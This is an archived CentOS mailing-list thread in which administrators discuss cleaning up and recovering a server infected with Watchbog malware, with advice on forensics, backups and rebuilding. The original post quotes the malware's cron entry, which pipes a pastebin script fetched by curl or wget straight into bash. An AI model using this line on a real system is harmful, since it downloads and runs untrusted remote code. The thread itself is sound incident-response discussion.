Re: CentOS 7.5 Linux box got infected with Watchbog malware

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]





On 12/18/18 8:31 AM, mark wrote:
Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
<kaushalshriyan@xxxxxxxxx> wrote:


Is there a way to find out how the CentOS 7.5 Linux box got infected
with malware? Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw
areransomware.html to carry out the below steps and is done manually.

1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry */1 * * * * (curl -fsSL
https://pastebin.com/raw/aGTSGJJp||wget -q -O-
https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3)ps aux | grep watchbog
kill -9 pidof watchbog

Any suggestions or recommendations to find out how CentOS 7.5 Linux
box got infected with Watchbog Malware. Is there any open source
software which can

do you have untampered log files?

be installed on CentOS 7.5 Linux box to detect and prevent Malware?

Standard compromise recovery procedure since forever is (your local
policy my have slightly different order about notifications and similar):

1. back up all user data

You should have been doing that all along.

Do not exclude this from the [more or less] full list of standard compromise recovery routine I tried to outline. Even though you had to do backups all the time, backup at this point may have latest changes not present in latest routine backup. And you last had o restore something from your backup how many years ago? So your knowledge that that backup indeed works was tested years ago...


First step, before you do anything else, is pull the hard drive, put it
into a hot-swap or external bay, and dd the entire drive to an identical
one. THAT goes to forensics.

Indeed. Or adjust this part to "everything is hosted on hardware RAID device", for which you will have to boot off DVD, mount and dump all elsewhere for forensics.

But! Forensics is different and sophisticated story, and when you learn in depth that the first thing you will learn is: Powering off the system, or even just disconnecting from the network may prevent you totally from learning several things about compromise. But this is really huge subject...


Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
settings - that includes pulling the battery... *then* set what you need,
and then build it new, and restore from backups.
<snip>
Why, yes, we did just do this, um, last year, after a compromise via a
WordPress security hole. It did not manage to get to any other systems (we
checked, and only a few run WordPress).

And yes, preventing, no matter how tedious it may seem is orders of magnitude easier than recovering from compromise. So: secure the box. And update, update, update....


Valeri


       mark




_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos


--
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos



[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]


  Powered by Linux